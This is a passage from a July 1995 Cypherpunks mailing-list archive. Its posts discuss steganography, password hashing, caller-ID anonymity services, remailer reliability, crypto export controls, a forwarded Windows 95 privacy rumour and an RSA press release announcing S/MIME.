PMeDL3lYZ2GhjNBkVvRt554b1iL/Gaq/ckbwTpVvcMeUeN0HqWvYMEXnqTIzye8u 1i9kqo6ENiw= =fqe9 -----END PGP SIGNATURE----- From merriman at arn.net Mon Jul 24 05:48:06 1995 From: merriman at arn.net (David K. Merriman) Date: Mon, 24 Jul 95 05:48:06 PDT Subject: crypto-stegonography? Message-ID: <199507241239.HAA16213@arnet.arn.net> I got to thinking about crypto and stego, and wondered if it wouldn't conceivably be a useful technique to marry crypto and stego in the following manner (probably thought of before :-): 1> encrypt a message in the Usual Manner. 2> by prior arrangement with the other party (or parties, more on that in a moment), select a random character that has a bit position value equal to a bit in the encrypted message. That is, if the first bit of your encrypted message was a '0', randomly select a character that had a '0' in a specific bit position (say, bit 3). repeat for remainder of message. 3> transmit said message, mimicing any one of a number of formats. I think such a scheme would have a number of benefits, in that it could _conceivably_ support up to 8 recipients (8 different messages encrypted independently), though 6 would probably be a practical limit. The message could easily be formatted to resemble a uuencoded image or almost anything else (with minimal prior arrangement). It maintains real encryption while providing a considerable 'distractor' effect on an opponent (ie, the old magician's trick of "watch this hand while I do the real stuff with the other one" :-). With the same message sent to multiple recipients, the _apparent_ harmlessness of the message would seem to increase, as well. For a single recipient, the bandwidth requirements really sucks rocks, but for multiple recipients, the efficiency goes *way* up. As observed, this has probably been thought of before, but I'd be interested in hearing any comments.... Dave Merriman This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From ab411 at detroit.freenet.org Mon Jul 24 05:49:17 1995 From: ab411 at detroit.freenet.org (David R. Conrad) Date: Mon, 24 Jul 95 05:49:17 PDT Subject: big word listing Message-ID: <199507241249.IAA28264@detroit.freenet.org> Monty Harder wrote: Andrew Spring wrote: >AS> > password >AS> > >AS> >and sends it to the server as "APOP username 58349485whatever89583449". > >AS> Of course, this requires the user password to be stored unencrypted on the >AS> server; which you may not want to do. > > Here's a variation, then: Instead of using process-id.clock to >generate the random stuff for the challenge, have your own (P)RNG make >up a bunch of them ahead of time, calculate the hashes, and store the >challenges and hashes on the server. Instead of that, send H(pid,clock,hostname,H(password)) to the server, for some hash function H(). Then the server only needs to keep H(password) around, rather than the plain password. This is similar to current systems, except the plain password isn't sent across the network. H() can be whatever you fancy; 25 crypts, MD5, SHA-1, etc. Of course, I'm sure this is far from being a new idea.... -- David R. Conrad, ab411 at detroit.freenet.org, http://web.grfn.org/~conrad/ Finger conrad at grfn.org for PGP 2.6 public key; it's also on my home page Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From trei Mon Jul 24 06:35:04 1995 From: trei (Peter Trei) Date: Mon, 24 Jul 95 06:35:04 PDT Subject: NOISE: advice on applications Message-ID: <9507241334.AA06479@toad.com> > > > I've just recently set up a PPP account, mainly so I could > run Netscape. I'm thinking of adding PC Eudora for mail. > Any advice on a good newsreader and any other applications > it would be handy to have? > Thanks. > AR While I have yet to find the Perfect PC Mail Client, I have to say that I find Pegasus far superior to Eudora. The free version of Pegasus includes mail filtering capabilities, essential if you expect to receive mailing lists (such as cypherpunks). Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation trei at process.com From unicorn at access.digex.net Mon Jul 24 06:37:24 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 24 Jul 95 06:37:24 PDT Subject: CALLER ID AVOIDANCE In-Reply-To: Message-ID: On Sat, 22 Jul 1995, Sandy Sandfort wrote: > Date: Sat, 22 Jul 1995 14:27:50 -0700 (PDT) > From: Sandy Sandfort > To: Cypherpunks > Subject: CALLER ID AVOIDANCE > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > While reading the July issue of Soldier of Fortune, I ran across > an ad for yet another telephone anonymity service. It reads: > > CALL 1-900-CUT TRAX > > Secure your most sensitive calls from all forms of > caller I.D. and return-call technologies? > > Now make calls from your own telephone safely and > anonymously. No need to find a public phone to > be discreet. > > Trackers never see your number...only ours! And > their number will not appear on your phone bill. > > Call any number in the continental US... > > Just $3.95 a minute for safe secure conversations! > > Call 1-900-CUT-TRAX (1-900-288-8729) > Beacon Telesystems 914-423-3329 > > Not necessarily as secure as they would have you believe, but > it does demonstrate there is a market for anonymity, I guess. If one can afford it, I suggest chaining through 1-900-CUT-TRAX and 1-900-STO-PPER There was some talk of one or the other of these services halting access to other 1-900 numbers. Haven't used it recently enough to know if it still works. > > > S a n d y > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From perry at imsi.com Mon Jul 24 06:42:16 1995 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 24 Jul 95 06:42:16 PDT Subject: CALLER ID AVOIDANCE In-Reply-To: Message-ID: <9507241342.AA06105@snark.imsi.com> Black Unicorn writes: > If one can afford it, I suggest chaining through > 1-900-CUT-TRAX > and > 1-900-STO-PPER I doubt you can chain them -- how would they do billing? .pm From unicorn at access.digex.net Mon Jul 24 06:58:37 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 24 Jul 95 06:58:37 PDT Subject: CALLER ID AVOIDANCE In-Reply-To: <9507241342.AA06105@snark.imsi.com> Message-ID: On Mon, 24 Jul 1995, Perry E. Metzger wrote: > Date: Mon, 24 Jul 1995 09:42:01 -0400 > From: Perry E. Metzger > To: Black Unicorn > Cc: cypherpunks at toad.com > Subject: Re: CALLER ID AVOIDANCE > > > Black Unicorn writes: > > If one can afford it, I suggest chaining through > > 1-900-CUT-TRAX > > and > > 1-900-STO-PPER > > I doubt you can chain them -- how would they do billing? You could at one time. It was great fun. > > .pm > 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From raph at CS.Berkeley.EDU Mon Jul 24 07:00:59 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 24 Jul 95 07:00:59 PDT Subject: List of reliable remailers Message-ID: <199507241400.HAA24724@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.taylored.com This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp. hash"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"syrinx"} = " cpunk pgp reord mix post"; $remailer{"ford"} = " cpunk pgp"; $remailer{"hroller"} = " cpunk pgp hash mix cut ek"; $remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek"; $remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. 21 Apr 1995: The new version of premail (0.33) is out, with direct posting, perl5 and better MH support, and numerous bug fixes. Last ping: Mon 24 Jul 95 6:07:21 PDT remailer email address history latency uptime ----------------------------------------------------------------------- hacktic remailer at utopia.hacktic.nl *+********** 12:38 99.99% spook remailer at spook.alias.net *--********* 25:21 99.99% flame remailer at flame.alias.net +-++++++++++ 57:34 99.99% replay remailer at replay.com *+****++***+ 13:12 99.99% rmadillo remailer at armadillo.com +++++++++++ 49:13 99.99% crown mixmaster at kether.alias.net --+-+++-+--+ 1:25:56 99.98% bsu-cs nowhere at bsu-cs.bsu.edu ###*-#*#**** 13:47 99.98% portal hfinney at shell.portal.com #######***** 4:03 99.96% vishnu mixmaster at vishnu.alias.net ++*******+** 13:36 99.73% gondolin mixmaster at gondolin.org +*----*----- 1:45:44 99.73% vox remail at vox.xs4all.nl .------.-- 15:58:51 99.99% ideath remailer at ideath.goldenbear.com ........-. 14:21:20 99.32% ford remailer at bi-node.zerberus.de #-#+#++-**-* 39:46 99.26% extropia remail at extropia.wimsey.com _ --. -..-- 13:25:43 99.20% hroller hroller at c2.org +*-++#+#*--* 1:13:04 99.05% syrinx syrinx at c2.org +-------- -- 3:28:31 99.01% penet anon at anon.penet.fi --+++------ 8:45:41 98.69% alumni hal at alumni.caltech.edu #*#** ***** 4:36 97.24% rahul homer at rahul.net *##+-##***++ 10:07 99.98% rebma remailer at rebma.mn.org +--+-.-+_.- 21:34:08 86.95% c2 remail at c2.org ++-+++- -- 2:41:11 85.54% mix mixmaster at remail.obscura.com ---+ 3:12:31 77.55% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From unicorn at access.digex.net Mon Jul 24 07:01:01 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 24 Jul 95 07:01:01 PDT Subject: CALLER ID AVOIDANCE In-Reply-To: <9507241342.AA06105@snark.imsi.com> Message-ID: On Mon, 24 Jul 1995, Perry E. Metzger wrote: > Date: Mon, 24 Jul 1995 09:42:01 -0400 > From: Perry E. Metzger > To: Black Unicorn > Cc: cypherpunks at toad.com > Subject: Re: CALLER ID AVOIDANCE > > > Black Unicorn writes: > > If one can afford it, I suggest chaining through > > 1-900-CUT-TRAX > > and > > 1-900-STO-PPER > > I doubt you can chain them -- how would they do billing? > > .pm > I just tried both ways, can't anymore. Pity. 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From dhenson at itsnet.com Mon Jul 24 07:03:09 1995 From: dhenson at itsnet.com (Don Henson) Date: Mon, 24 Jul 95 07:03:09 PDT Subject: Now You Can Own a 'Munitions Tshirt' Message-ID: <199507241414.IAA19908@scratchy.itsnet.com> Now you can wear a TSHIRT that has been classified as a MUNITION by the US Goverment. That's right! The US International Traffic in Arms Regulations (ITAR) makes exporting cyrptographic materials illegal. ITAR further defines export as providing cryptographic information to a non-US/Canadian citizen even if you are inside the US at the time. Providing information is further defined as telling or showing information to a non-US/Canadian citizen. The Munitions Tshirt has a Perl implementation of the RSA algorithm (the one used by PGP) printed on the front along with a bar-code of the same algorithm. What all the above means is that if you wear the Munitions Tshirt where a non-US/Canadian citizen can see it, even if it is inside the US, you have just exported cryptographic material (which is already freely available outside the US) and have become a criminal in the eyes of the US Government. Now you too can become an international arms dealer for the price of a tshirt (US$15.95 - US$19.95, depending on size) and the guts to wear it. If you are a non-US/Canadian citizen, you can still own a Munitons Tshirt by ordering the tshirt from a source that is outside the US. The email response to a request for info (see next paragraph) includes full instructions for ordering the tshirt no matter where you live. For more information on how to own this classic example of civil disobedience, just send email to dhenson at itsnet.com with the subject of 'SHIRT'. (You don't have to be a US/Canadian citizen to request the info.) Or, if you have WWW access, just point your Web browser to: http://colossus.net/wepinsto/wshome.html By the way, 25% of the profits from the sale of the tshirt (in the US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help defend the author of PGP from harassment and possible prosecution by the Fedgoons. And if you get arrested for wearing the Munitions Tshirt, we'll refund your purchase price. :-) Get your Munitions Tshirt now. Who knows how long they'll stay in production! Don Henson, Managing Director (PGP Key ID = 0X03002DC9) West El Paso Information Network (WEPIN) Check out The WEPIN Store at URL: http://colossus.net/wepinsto/wshome.html From mp at io.org Mon Jul 24 07:20:40 1995 From: mp at io.org (M. Plumb) Date: Mon, 24 Jul 95 07:20:40 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) In-Reply-To: <12071.9507111559@exe.dcs.exeter.ac.uk> Message-ID: <199507241415.KAA26817@wink.io.org> Sorry for taking so long to respond to this. I have been checking out the Canadian rules for exporting crypto. Basically (according to "A Guide to Canada's Export Controls", published by the Department of Foreign Affairs and International Trade) public domain software can be exported from Canada -- one might need to file a form with Canadian Customs for each export, but the export it self is legal. (Public domain is defined as technology that has been made available without restrictions upon it's further dissemination. Copyright restrictions do not remove technology from the public domain. So, I'm not quite sure if PGP falls within that definition.) However, goods of U.S. origin are export restricted, unless said goods are further processed outside the U.S. so as to result in a substantial change in value, so some of the PGP development would need to be done in Canada. -- -marc From andrew_loewenstern at il.us.swissbank.com Mon Jul 24 07:30:45 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Mon, 24 Jul 95 07:30:45 PDT Subject: An idea about Java and remailer clients and servers... Message-ID: <9507241429.AA00433@ch1d157nwk> Phil Fraering writes: > Does it have to be the case, then, that we even have separate client > and server versions? If a new program is going to be written in > Java, can't it have the functionality of both client and server? > > Why not "charge" for the ability to send an anonymous message with > the duty to have for a short time (maybe an hour or two) running > on your machine a node in a remailer network? Futplex writes: > It would be interesting to see how the market would react to this. > There might be quite a bit of reluctance to take on the liability > of a remailer operator just to send an anonymous message (maybe > that's a good thing ;) Running a remailer is forbidden by many ISP usage agreements. Many of the potential users of a remailer may not be able to 'pony-up' a few hours of remailer operation lest they loose their account. I thought the idea was to get more people using the remailers, not fewer (perhaps just fewer abusers)... Also, users must be aware of a remailer (and have its public key) to use it. I suppose you could temporarily add the user to a web page which clients checked for a list of current remailers. However, there are issues of reputations of long-running remailers, etc... andrew From rmartin at alias.com Mon Jul 24 07:59:47 1995 From: rmartin at alias.com (Richard Martin) Date: Mon, 24 Jul 95 07:59:47 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) In-Reply-To: <199507241415.KAA26817@wink.io.org> Message-ID: <9507241057.ZM10085@glacius.alias.com> On Jul 24, 10:15am, M. Plumb wrote: > I have been checking out the Canadian rules for exporting crypto. > Basically (according to "A Guide to Canada's Export Controls", > published by the Department of Foreign Affairs and International > Trade) public domain software can be exported from Canada -- one > might need to file a form with Canadian Customs for each export, > but the export it self is legal. (Public domain is defined as > technology that has been made available without restrictions upon > it's further dissemination. Copyright restrictions do not remove > technology from the public domain. So, I'm not quite sure if PGP > falls within that definition.) Synchronicity! [argh] I had been considering making a posting along the same lines. Note that the form required [EXT 1042(09/93)] has a $15 processing fee. (Which might be peanuts if we're selling a frigate, but which is a royal pain for a piece of crypto.) Page 1, "A guide to Canada's Export Controls", April 1994 General "Software" Note This list does not embargo "software" which is either: 1. Generally available to the public by being: a. Sold from stock at retail selling points, without restriction, by means of: 1. Over-the-counter transactions; 2. Mail order transactions; or 3. Telephone call transactions; and b. Designed for installation by the user without further substantial support by the supplier; or 2. "In the public domain". Excerpts relating to Canadian Export controls on cryptography should be up somewhere off http://www.io.org/~samwise/interesting.html#privacy towards the end of the week. frodo =) -- Richard Martin Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team] rmartin at alias.com/g4frodo at cdf.toronto.edu Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992 From jya at pipeline.com Mon Jul 24 09:09:10 1995 From: jya at pipeline.com (John Young) Date: Mon, 24 Jul 95 09:09:10 PDT Subject: PKA_boo Message-ID: <199507241608.MAA12003@pipe1.nyc.pipeline.com> 7-24-95. NYPaper: [Denise Caruso's column] "New Microsoft network will offer a wealth of privacy." It seems unthinkable that anything has been left unsaid about the Microsoft Network. And even less has been said about MSN's design, which Microsoft has said complies with the new data-privacy rules that the European Union is expected to adopt in September. The new European policy would set out clear guidelines about the way in which companies -- in this case, Microsoft and its independent content providers -- can collect and use the personal data about their European customers that the companies gather electronically. Microsoft has said it plans to extend the same privacy provisions to its American customers. The European provisions are a striking departure from current practices in the United States, where few restrictions protect consumers from marketeers, who collect and sell consumers' personal information. PEK_boo From tomb at syntec.com Mon Jul 24 09:54:11 1995 From: tomb at syntec.com (Tom Bizzell) Date: Mon, 24 Jul 95 09:54:11 PDT Subject: MSN privacy Message-ID: Here is some info that was circulating around our office today. > *** Forwarding note from KKASTRP --RHQVM12 07/10/95 10:43 *** > To: KURT --RHQVM02 Anderson, K. K. LLANDER --RHQVM17 Anderson, L.L. > > Karen R. Kastrup 8/826-4664 9/(914)766-4664 > Manager, Services Accounting > Somers 4, 3J36 > Subject: Windows 95 > > *** Forwarding note from KASTRUP --ISSCVM 07/10/95 10:31 *** > To: KKASTRP --RHQVM12 > > *** Resending note of 07/10/95 09:43 > STAN KASTRUP > ISSC - INFORMATION STRATEGY & MANAGEMENT > 8/351-3229 9/(914) 288-3229 > SUBJECT: Windows 95 > Amazing! (I chopped off about 10 "forwards.") > ------- Forwarded Message > > > From: Carlos Shaw IBMMAIL:USIB2T2D cshaw at vnet.ibm.com > > *************************************************************** > > Subject: news on Windows95 > > ---------------------------------------------------------------------- > > Newsgroups: comp.risks > > From: cnorloff at tecnet1.jcte.jcs.mil > > > > Date: Wed, 17 May 95 13:44:40 EDT > > > > Microsoft officials confirm that beta versions of Windows 95 include a > > small viral routine called Registration Wizard. It interrogates every > > system on a network gathering intelligence on what software is being run > > on which machine. It then creates a complete listing of both Microsoft's > > and competitors' products by machine, which it reports to Microsoft when > > customers sign up for Microsoft's Network Services, due for launch later > > this year. > > > > "In Short" column, page 88, _Information Week_ magazine, May 22, 1995 > > > > The implications of this action, and the attitude of Microsoft to plan > > such action, beggars the imagination. > > > > An update on this. A friend of mine got hold of the beta test CD > > of Win95, and set up a packet sniffer between his serial port and the > > modem. When you try out the free demo time on The Microsoft Network, it > > transmits your entire directory structure in background. > > This means that they have a list of every directory (and, potentially > > every file) on your machine. It would not be difficult to have something > > like a FileRequest from your system to theirs, without you knowing about > > it. This way they could get ahold of any juicy routines you've written > > yourself and claim them as their own if you don't have them copyrighted. > > > > Needless to say, I'm rather annoyed about this. > > So spread the word as far and wide as possible: Steer clear of Windows > 95. > > There's nothing to say that this "feature" will be removed in the final > > release. > > > > David > > > > Carlos Shaw | nodeid/userid: stlvm6(cshaw) > > IBM - STL (J95/E443) | (408) 463-4995; (tie) 8-543-4995 > > 555 Bailey Ave | fax (408) 463-4763; (tie) 8-543- > > San Jose, CA 95141 | CompuServe id: 73203,1424 > > Subj: news on Windows95 > > > >�� > > >-------- End of Forwarded Message > > ------------------------------------- E-mail: dough at syntec.com (Doug Hadley) Date: 07/24/95 Time: 10:54:04 ------------------------------------- From sunder at escape.com Mon Jul 24 11:06:46 1995 From: sunder at escape.com (Ray Arachelian) Date: Mon, 24 Jul 95 11:06:46 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507200542.AA23518@anon.penet.fi> Message-ID: On Thu, 20 Jul 1995, Mole Rat wrote: > Sounds like an untapped market segment. In which periodicals > should one advertise consulting services in order to cover the > mobster market? For those of the anonymous pay-me-in-(digitial/physical)-cash only underground types, yes. > Seriously, I imagine that organized crime, like any other > business, uses computers. Their level of crypto usage could be > impressive, given the incentives. Speculation of course. No better, or closer to the truth either one way or the other? (Any of you anons work for the mob? if so, is the mob 'puter-happy?) > "There is no honor among thieves." Wiretaps, bugs, tails, > informants, and good, old-fashioned, physical intimidation > probably produce plenty of leads. Two logical possibilities. 0. Mobsters still get caught and thrown in jail. 1. They don't use crypto at all. All records are in the open and searchable. LEA's wet dream. 2. They use strong crypto and can't be caught at all. LEA's nightmare. 3. They use crypto, but are still catchable (oops, the secret is out of the bag now, cancel all the computer related RICO nonsense.) 4. They don't use crypto, but keep no records, or hide them well. They can still be caught by LEA's. 3 & 4 are the most likely, and the LEA's shameful little secret. They cry wolf to set a wolf trap, but meanwhile they're hunting wabbits, not wolves. > I wasn't entirely facetious above about working for the mob, > they probably pay well and don't bother with FICA and such. Plus > there's that "family" atmosphere.... Errmm.. precisely the reason to stay away from them. While the first few parts of your above paragraph are quite tempting, the last sentence is deadly. You can't quit from your "family" without cement shoes. So I'll stay away from that line of ...um... work. =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From mech at eff.org Mon Jul 24 11:15:58 1995 From: mech at eff.org (Stanton McCandlish) Date: Mon, 24 Jul 95 11:15:58 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <199507220451.AAA25935@panix4.panix.com> Message-ID: <199507241813.OAA20458@eff.org> > Let's read the bill and get ready for a fight. We should hold Grassley > accountable for this next election. But we're spinning our wheels by > acting against every bill that affects one of our issues. > > -Shabbir I'd agree with the gist of Shabbir's entire message, except the last sentence, which I think needs some qualification. Trying to fight every useful fight right now *is* counter-productive, because we're not at a stage yet where any of our organizations, or our coalitional meta-organization, can handle the load. And the grassroots activist infrastructure of the net can't handle it either. But, that's not the way it should be. We need to, and if we all work at it, we will, get to the state at which we can handle the load, and can fight all the good fights. Part of what's needed is, frankly, for folks like those reading this message to take a little time out from endless arguments on newsgroups and mailing lists, from all the entertainment and fund, and become a little more politically active so we can preserve the possibility of having any fun at all. How many of you are organizing groups like EF-Houston or VTW or SEA on a local or state basis? I don't imagine many virtual hands are raising. Hop to it folks. This is no a one-dimensional fight, it's three dimensional. You've got lobbying and national-level policy work being done, but local grassroots organizing via the net is still in a larval stage, and needs to be advanced. So does coordinated response to crap journalism and lack of serious coverage of the issues we find important. Get in touch if you're interested in helping start local groups. I'll keep a geographical list and try to put fairly close matches in contact with eachother. -- Stanton McCandlish
mech at eff.org
Electronic Frontier Foundation
Online Services Mgr. From tcmay at sensemedia.net Mon Jul 24 11:23:39 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 24 Jul 95 11:23:39 PDT Subject: S/MIME and the Future of Netscape Message-ID: At 12:54 PM 7/23/95, Bob Snyder wrote: >tcmay at sensemedia.net said: >> With regard to SSL and Netscape not being open to outside developers, >> several leading e-mail outfits, including Qualcomm, Netscape, >> Frontier, etc., are working on an interoperable secure e-mail >> standard called "Secure/MIME," or "S/MIME." > >Do you have sources for this information? MOSS is out there at least as a >Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the >original author of Eudora, is pretty active in the MIME community and I doubt >he would support a second MIME type to do the same thing... Some of you have expressed skepticism about the mention of "S/MIME." The longterm significance of S/MIME is debatable, of course. But here's the press release I got from Jim Bidzos: Date: Wed, 19 Jul 95 10:34:04 PDT From: jim at RSA.COM (Jim Bidzos) To: tcmay at sensemedia.net Subject: Integrating RSA into Netscape (Netnews and Mail) FYI... RSA News Release For information, contact: Patrick Corman or Lisa Croel Corman/Croel Marketing & Communications (415) 326-9648 or (415) 326-0487 Corman at cerf.net or Lcroel at mediacity.com Major Networking and Messaging Vendors Endorse Open Specification for Secure E-Mail S/MIME Based on RSA Public-Key Encryption Technology Redwood Shores, CA -- July 24, 1995 -- Several major networking and messaging vendors, in conjunction with leading cryptography developer RSA Data Security today announced their endorsement of a specification for interoperable e-mail security, to be known as "S/MIME", short for "Secure/Multipurpose Internet Mail Extensions". Several of the vendors announced plans to release S/MIME-compliant products next quarter. The S/MIME specification is based on the popular Internet MIME standard (RFC 1521), which provides a general structure for the content type of Internet mail messages and allows extensions for new content type applications... like security. S/MIME will allow vendors to independently develop interoperable RSA-based security for their e-mail platforms, so that an S/MIME message composed and encrypted on one vendor's application can be successfully received and decrypted on a different one. Major vendors who today announced support for the S/MIME secure interoperable e-mail plan include Microsoft, Lotus, Banyan, ConnectSoft, QUALCOMM, Frontier Technologies, Network Computing Devices, FTP Software, VeriSign, Wollongong, SecureWare and RSA. Sophisticated encryption and authentication technology has been viewed as the crucial enabling technology for electronic commerce over the World Wide Web -- but encryption has been slow to come to e-mail, with most packages offering no security whatsoever. "Commercial e-mail packages don't offer encryption because, up until now, there have been few open security specifications," said Jim Bidzos, RSA President. "Internet Privacy-Enhanced Mail (PEM) is excellent for text-based messages. MIME represents the next generation, and has been widely adopted because of its ability to handle nearly any content type. The new S/MIME allows you to secure this rich content." Today's flurry of official endorsements from industry bodes well for the S/MIME plan. "We fully expect S/MIME to be the defacto standard for vendor-independent e-mail encryption. Solid encryption is something that our customers have been asking us for, but up until now, we didn't have a viable option. S/MIME gives them everything they want: RSA encryption, digital signatures, and the ability to mix different vendors' e-mail systems without losing that security," said Bob Dickinson, ConnectSoft Vice President and General Manager Consumer Online Products & Services Division. "Frontier Technologies believes that in the future most companies will routinely encrypt electronic mail messages sent over the public Internet," said Dr. Prakash Ambegaonkar, Frontier Technologies' president. "This will only happen once there is a well-understood standard for secure e-mail that is easy to implement. Frontier has several years experience in developing secure e-mail solutions. In order to speed the adoption of the S/MIME specification, Frontier Technologies intends not only to be one of the first vendors to support S/MIME in its networking software, but to also make our initial implementation of the S/MIME protocol freely available for other vendors to use as a reference." "The freedom to have a private conversation is fundamental to personal communication that is the essence of electronic mail," said John Noerenberg, Director of Engineering for QUEST products at QUALCOMM. "Wide-spread acceptance of specs like S/MIME make it possible for individuals and organizations alike to conduct their business over the net secure in the knowledge that their private business is, in fact, private." "FTP Software is glad to endorse the S/MIME blueprint for secure electronic communication," said John O'Hara, director of development for FTP Software. "Whether communicating with customers, business partners or remote offices, companies need to ensure that confidential information stays confidential. This was difficult in the past, since organizations are connected through diverse messaging systems from competing vendors. S/MIME eliminates those barriers by facilitating implementations across multiple vendor products." "Network Computing Devices is commited to answering market demand for network information access software providing an even higher level of protection and interoperability over LANs and across the Internet," said Mike Harrigan, co-founder and vice president of NCD. "S/MIME will further enhance our customers' ability to utilize our e-mail solution, Z-Mail, and Internet navigation software tool, Mariner, in such a secure networked environment. For this reason we fully intend to support the specification provided by S/MIME within the next quarter." This wll be an exciting catalyst for the rapid deployment of secure, interoperable e-mail from most of the industry leaders," said Web Augustine, VeriSign vice president of marketing & business development. "VeriSign is committed to making our Digital ID services available to all companies that implement S/MIME and desire to work with a trusted third-party to certify public keys for their end-users." S/MIME is based on the intervendor PKCS (Public Key Cryptography Standards) which were established by a consortium of RSA, Microsoft, Lotus, Apple, Novell, Digital, Sun and the Massachusetts Institute of Technology in 1991. PKCS is the most widely implemented suite of commercial cryptographic standards in the United States. The common PKCS specifications allow developers to independently develop secure applications that will interoperate with other PKCS-secured applications. Developers interested in S/MIME can get more information at RSA's web site, at http://www.rsa.com, in the "What's New" section. RSA Data Security is the world's "brand name" for cryptography, with over 10 million copies of RSA encryption and authentication technologies installed and in use worldwide. RSA technologies are part of existing and proposed 